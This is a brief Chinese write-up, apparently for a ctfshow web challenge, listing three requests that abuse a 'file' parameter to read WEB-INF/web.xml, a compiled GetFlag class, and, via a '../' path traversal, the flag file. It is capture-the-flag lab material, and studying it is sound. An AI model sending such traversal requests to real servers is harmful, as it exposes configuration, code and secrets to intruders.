为啥要整个 PHP 的。。。 和 web299 一样,先读读 web.xml /?file=WEB-INF/web.xml 然后读读 flag 对应的类 /?file=WEB-INF/classes/com/ctfshow/servlet/GetFlag.class 然后读读 flag /?file=../../../../../../../../../f1bg
